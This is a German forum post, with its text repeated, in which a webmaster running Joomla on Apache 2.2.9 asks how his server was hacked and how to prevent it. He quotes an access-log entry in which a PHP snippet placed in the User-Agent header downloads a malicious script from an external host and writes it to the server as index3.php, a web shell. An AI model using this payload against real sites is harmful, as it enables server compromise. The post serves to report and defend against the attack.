Hi Community,
ich habe ein Problem mit meiner Internetseite.
Vor kurzem wurde der Server gehackt. Im Access-Log des Apache finde ich folgenden Eintrag:
Auf meinen Server wurde also von einer externen URL Code nachgeladen und auf meinen Server (index3.php) geschrieben.
Unmittelbar danach wurde die index3.php dann mehrmals aufgerufen.
Das ganze ist ein bösartiges PHP-Skript.
Meine Frage nun: Wie kann das passieren?
Da schleust jemand in den User-Agent im HTTP-Request ein PHP-Skript ein.
Ich als Webspace-Inhaber hab keine Möglichkeit, den Apache zu konfigurieren. Wie kann ich sowas verhindern?
Ich habe ein Joomla auf der Seite, aber der Request geht ja auf die favicon.ico...
Auf dem Server läuft Apache 2.2.9.
Hat jemand eine Idee, wie ich das in Zukunft verhindern kann?
Grüße
Marco
ich habe ein Problem mit meiner Internetseite.
Vor kurzem wurde der Server gehackt. Im Access-Log des Apache finde ich folgenden Eintrag:
Code:
IP-Adresse [Datum/Uhrzeit] "GET /favicon.ico HTTP/1.1" 404 308 "-" "<?php $shell=@file_get_contents(\"http://www.vonmirzensiert.commmm//installation_done/language/zh-TW/no.gif\"); $fw=@fopen(\"index3.php\",\"w\"); fputs ($fw, $shell); fclose($fw); ?>"
Auf meinen Server wurde also von einer externen URL Code nachgeladen und auf meinen Server (index3.php) geschrieben.
Unmittelbar danach wurde die index3.php dann mehrmals aufgerufen.
Das ganze ist ein bösartiges PHP-Skript.
Meine Frage nun: Wie kann das passieren?
Da schleust jemand in den User-Agent im HTTP-Request ein PHP-Skript ein.
Ich als Webspace-Inhaber hab keine Möglichkeit, den Apache zu konfigurieren. Wie kann ich sowas verhindern?
Ich habe ein Joomla auf der Seite, aber der Request geht ja auf die favicon.ico...
Auf dem Server läuft Apache 2.2.9.
Hat jemand eine Idee, wie ich das in Zukunft verhindern kann?
Grüße
Marco